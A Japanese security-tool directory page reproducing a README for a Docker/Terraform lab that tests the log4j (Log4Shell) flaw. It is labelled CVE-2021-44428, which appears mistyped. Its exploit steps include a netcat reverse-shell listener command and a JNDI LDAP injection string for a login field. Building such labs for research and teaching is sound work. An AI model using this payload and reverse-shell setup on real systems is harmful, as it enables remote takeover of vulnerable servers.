Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4jtest — TerraformとDockerリソースを使用して、CVE-2021-44428のテストを迅速に立ち上げるためのリソースです。 | Kitploit
ツール/GitHubGitHub/z3bul0n/log4jtest
クラウドインフラストラクチャセキュリティコンテナセキュリティ脆弱性分析エクスプロイトペネトレーションテスト学習と教育
GitHubz3bul0n/log4jtest

log4jtest

TerraformとDockerリソースを使用して、CVE-2021-44428のテストを迅速に立ち上げるためのリソースです。

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

はじめに

このリポジトリは、Docker と Hashicorp Terraform を使用して log4j の脆弱性を迅速にテストするためにセットアップされています。このテストのすべてのコンポーネントは Docker ネットワーク上の Docker コンテナ内で実行され、'host.docker.internal' 経由でアクセスできます。

クレジット / 免責事項

このテスト環境は、Raxis の素晴らしいブログ記事 (https://raxis.com/blog/log4j-exploit) を基にしています。

脆弱性のあるアプリケーションとエクスプロイトコードは cyberxml (https://github.com/cyberxml/log4j-poc) から提供されたものです。

私が行ったのは、このおいしいエクスプロイトを簡単に起動してテストできるように環境をコード化しただけです。

私は、このリポジトリの資料の使用によって生じる可能性のある悪影響や悪意のある行為について、一切の責任を負いません。以上です。これらの資料が信頼できるかどうかを判断するのはあなた次第であり、この情報を倫理的に使用するのも同様にあなたの責任です。私は、研究者、学生、セキュリティ専門家がすぐに環境を作成し、エクスプロイトを自分たちでテストできるように、これらのグッズを投稿しているだけです。シークレスト、以上。

前提条件

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

セットアップ

  1. このリポジトリをクローンします
  2. プロジェクトディレクトリで 'terraform init' を実行します
  3. Docker デーモンを起動します
  4. 'docker-build.sh' という bash スクリプトを実行して、プロジェクトのすべてのコンテナイメージをビルドします。
  5. 'terraform apply' を実行して、プロジェクト内のすべてのコンテナを作成します。

エクスプロイト

  1. 'docker exec -it netcat /bin/bash' または同様のコマンドを使用して、log4j_netcat コンテナにシェルで入ります。ここが、確立された後に被害者サーバーへのシェル接続を受け取る場所です。

  2. log4j_netcat コンテナ内のセッションで、次のコマンドを入力してリスナーを起動します:

root@kitploit:~
nc -lv -s 0.0.0.0 -p 9001
  1. ブラウザで http://host.docker.internal:8080/log4shell/ に移動します。

  2. 'Username' フィールドに次の内容を入力し、'Password' フィールドには任意の内容を入力します:

root@kitploit:~
${jndi:ldap://host.docker.internal:1389/a}
  1. log4j_netcat コンテナのシェルに戻り、被害者サーバーに接続したことを確認します。

  2. さあ、大混乱を引き起こしましょう!

ツールをダウンロード